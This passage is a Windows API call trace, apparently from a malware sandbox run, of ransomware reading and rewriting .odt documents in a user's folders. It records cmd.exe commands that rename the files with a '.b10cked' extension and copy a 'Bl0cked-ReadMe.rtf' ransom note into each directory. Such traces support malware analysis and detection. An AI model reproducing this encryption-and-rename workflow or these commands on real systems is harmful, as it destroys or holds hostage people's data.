lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.030] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.031] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x784c [0138.031] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.031] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x7364 [0138.031] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x784c [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x784c [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.032] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.032] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3c25, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3c25, lpOverlapped=0x0) returned 1 [0138.033] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.033] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3c25, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3c25, lpOverlapped=0x0) returned 1 [0138.033] SetFilePointer (in: hFile=0x114, lDistanceToMove=-15397, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3c27 [0138.033] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3c25, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3c25, lpOverlapped=0x0) returned 1 [0138.033] SetFilePointer (in: hFile=0x114, lDistanceToMove=-15397, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3c27 [0138.033] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3c25, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3c25, lpOverlapped=0x0) returned 1 [0138.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="egB3USbk0IDbq.odt", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0138.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="egB3USbk0IDbq.odt", cchWideChar=17, lpMultiByteStr=0x13286f4, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="egB3USbk0IDbq.odt", lpUsedDefaultChar=0x0) returned 17 [0138.040] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x784c [0138.040] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.040] CloseHandle (hObject=0x114) returned 1 [0138.041] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT") returned 0x25 [0138.042] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0138.042] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT\" \"C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT\" \"C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xe60, dwThreadId=0xe5c)) returned 1 [0138.050] CloseHandle (hObject=0x110) returned 1 [0138.050] CloseHandle (hObject=0x114) returned 1 [0138.050] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.050] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0138.050] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount2=47) returned 1 [0138.050] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.050] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.050] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0138.050] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.050] ReleaseMutex (hMutex=0xf8) returned 1 [0138.050] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.050] ReleaseMutex (hMutex=0xf8) returned 1 [0138.051] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.051] ReleaseMutex (hMutex=0xf8) returned 1 [0138.051] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.051] ReleaseMutex (hMutex=0xf8) returned 1 [0138.051] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\vaFvM9aFd9qECGT.odt" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\vafvm9afd9qecgt.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.051] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19484028658) returned 1 [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1427a [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.053] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.053] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.053] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1427a [0138.053] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.053] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x13d92 [0138.053] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1427a [0138.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1427a [0138.054] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.055] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.055] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa13c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa13c, lpOverlapped=0x0) returned 1 [0138.055] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.055] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa13c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa13c, lpOverlapped=0x0) returned 1 [0138.055] SetFilePointer (in: hFile=0x114, lDistanceToMove=-41276, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa13e [0138.056] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa13c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa13c, lpOverlapped=0x0) returned 1 [0138.056] SetFilePointer (in: hFile=0x114, lDistanceToMove=-41276, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa13e [0138.056] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa13c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa13c, lpOverlapped=0x0) returned 1 [0138.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vaFvM9aFd9qECGT.odt", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0138.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vaFvM9aFd9qECGT.odt", cchWideChar=19, lpMultiByteStr=0x13286f4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vaFvM9aFd9qECGT.odt", lpUsedDefaultChar=0x0) returned 19 [0138.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1427a [0138.062] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.062] CloseHandle (hObject=0x114) returned 1 [0138.063] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\vaFvM9aFd9qECGT.odt", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT") returned 0x3f [0138.064] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0138.064] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xe54, dwThreadId=0xdf8)) returned 1 [0138.106] CloseHandle (hObject=0x110) returned 1 [0138.106] CloseHandle (hObject=0x114) returned 1 [0138.106] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0138.106] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0138.106] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount2=47) returned 1 [0138.106] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0138.106] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.106] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0138.106] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0138.107] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0138.107] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0138.107] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0138.107] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0138.107] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0138.107] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, 